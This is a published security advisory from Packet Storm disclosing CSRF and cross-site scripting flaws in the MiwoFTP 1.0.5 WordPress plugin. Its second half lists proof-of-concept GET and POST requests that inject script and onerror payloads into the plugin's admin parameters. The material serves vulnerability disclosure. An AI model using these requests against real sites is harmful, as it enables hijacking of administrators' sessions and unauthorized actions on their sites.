WordPress MiwoFTP 1.0.5 CSRF / Cross Site Scripting

2015-04-15T00:00:00
ID PACKETSTORM:131435
Type packetstorm
Reporter LiquidWorm
Modified 2015-04-15T00:00:00

Description

                                        
                                            `  
WordPress MiwoFTP Plugin 1.0.5 Multiple CSRF XSS Vulnerabilities  
  
  
Vendor: Miwisoft LLC  
Product web page: http://www.miwisoft.com  
Affected version: 1.0.5  
  
Summary: MiwoFTP is a smart, fast and lightweight file manager  
plugin that operates from the back-end of WordPress.  
  
Desc: MiwoFTP WP Plugin suffers from multiple cross-site request  
forgery and xss vulnerabilities. The application allows users to  
perform certain actions via HTTP requests without performing any  
validity checks to verify the requests. This can be exploited to  
perform certain actions with administrative privileges if a logged-in  
user visits a malicious web site. Input passed to several GET/POST  
parameters is not properly sanitised before being returned to the  
user. This can be exploited to execute arbitrary HTML and script  
code in a user's browser session in context of an affected site.  
  
Tested on: Apache 2.4.10 (Win32)  
PHP 5.6.3  
MySQL 5.6.21  
  
  
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2015-5241  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5241.php  
  
Vendor: http://miwisoft.com/wordpress-plugins/miwoftp-wordpress-file-manager#changelog  
  
  
24.03.2015  
  
--  
  
  
GET:  
(params: dir, item, order, srt)  
-------------------------------  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=list&dir=wp-content"><script>alert(1)</script>&order=name&srt=yes  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=wp-content%2Fuploads&item=test.php"><img%20src%3da%20onerror%3dalert(2)>&order=name&srt=yes  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name"><script>alert(3)</script>&srt=yes&searchitem=test&subdir=y  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes"><script>alert(4)</script>  
  
  
---  
  
  
POST:  
(params: code, fname, new_dir, newitems[], searchitem, selitems[])  
------------------------------------------------------------------  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=wp-content%2Fuploads%2F2015&item=test.php&order=name&srt=yes  
- dosave=yes&code="><script>alert(1)</script>&fname=test.php  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=edit&dir=wp-content%2Fuploads%2F2015&item=test.php&order=name&srt=yes  
- dosave=yes&code=1&fname=test.php"><img%20src%3da%20onerror%3dalert(2)>  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post&dir=wp-content%2Fuploads&order=name&srt=yes  
- do_action=copy&confirm=false&first=n&new_dir=wp-content%2Fuploads%2F1"><script>alert(3)</script>&selitems%5B%5D=test&newitems%5B%5D=test.php  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=post&dir=wp-content%2Fuploads&order=name&srt=yes  
- do_action=copy&confirm=false&first=n&new_dir=wp-content%2Fuploads%2F2015&selitems%5B%5D=test&newitems%5B%5D=test.php"><script>alert(4)</script>  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=search&order=name&srt=yes  
- searchitem=test"><script>alert(5)</script>&subdir=y  
  
/wordpress/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=arch&dir=wp-content%2Fuploads&order=name&srt=yes  
- selitems%5B%5D=test.zip"><script>alert(6)</script>&name=test&type=zip  
`